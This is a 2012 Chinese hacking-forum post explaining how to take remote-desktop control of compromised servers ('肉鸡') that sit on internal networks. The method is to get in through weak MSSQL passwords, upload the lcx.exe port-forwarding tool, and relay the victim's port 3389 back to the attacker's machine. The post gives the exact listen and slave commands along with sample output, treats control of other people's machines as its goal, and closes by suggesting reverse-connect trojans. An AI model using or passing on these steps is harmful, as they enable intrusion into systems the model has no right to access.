中国网络渗透测试联盟

标题: 内网渗透中的端口转发 [打印本页]

作者: admin    时间: 2012-9-23 14:27
标题: 内网渗透中的端口转发
以前抓肉鸡都是通过1433弱口令,然后....
    但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...
    lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
    用法:如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389    那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。
    例:现在有一个ip为 201.1.1.1的1433弱.用端口扫描只发现开放了1433端口.用sqltools链接,dir 看一下  
C:\>DIR C:\

2004/09/17   10:32        <DIR>           autoAK
2005/02/21   17:08                12,541 avgun.log
2005/02/21   17:48             9,347,344 bitdefender_free_win_v72.exe
2006/03/23   09:28        <DIR>           CASIO_DATA
2005/02/09   11:09                 8,574 CLDMA.LOG
2006/03/25   09:53        <DIR>           common
2005/09/29   09:38                12,313 devicetable.log
2005/11/08   15:44        <DIR>           DNN
2005/04/14   09:43                   468 Documents and Sett
2006/04/02   13:44        <DIR>           Documents and Settings
2006/03/22   14:05        <DIR>           han
2005/11/02   09:15        <DIR>           Inetpub
2006/03/25   09:53        <DIR>           Microsoft UAM Volume
2004/08/27   16:46                13,030 PDOXUSRS.NET
2005/02/08   14:16        <DIR>           pix
2006/04/02   13:45        <DIR>           Program Files
2005/10/10   14:46        <DIR>           SD_VIDEO
2006/04/02   13:45        <DIR>           WINNT
2005/02/01   13:55        <DIR>           WUTemp

netstat -an 查看开放端口

    TCP     0.0.0.0:3376            0.0.0.0:0               LISTENING
    TCP     0.0.0.0:3389            0.0.0.0:0               LISTENING
    TCP     0.0.0.0:3791            0.0.0.0:0               LISTENING
    TCP     0.0.0.0:3877            0.0.0.0:0               LISTENING

终端已开.看下IP

ipconfig
C:\>ipconfig
   Windows 2000 IP Configuration   Ethernet adapter
   Connection-specific DNS Suffix   . :
   IP Address. . . . . . . . . . . . : 192.168.1.24  
   Subnet Mask . . . . . . . . . . . : 255.255.255.0  
   Default Gateway . . . . . . . . . : 192.168.1.1

192这样的是内网了...
现在可以用lcx.exe搞定了...
上传lcx.exe到肉鸡...

C:\>dir lcx.exe
C:\WINNT\system32

2006/04/02   13:40                32,768 lcx.exe

首先在自己机子的cmd下运行

lcx.exe -listen 51 3389

意思是监听51端口并转发到3389端口
显示如下:

[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......

然后在肉鸡上运行 lcx.exe -slave 你的IP 51 201.1.1.1 3389
201.1.1.1是我举例用的肉鸡IP.换成你的..
运行以后本机监听端口就会收到信息.

[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
[+] Accept a Client on port 55 from 201.1.1.1 ......
[+] Waiting another Client on port:3389....

好了.现在在自己机子上链接 127.0.0.1 或者输你自己IP.
发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!
优点,搞定内网肉鸡.
缺点,有点麻烦,而且每次都要通过sqltools先进行端口转发.
当然也可以用反弹木马控制肉鸡了...




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2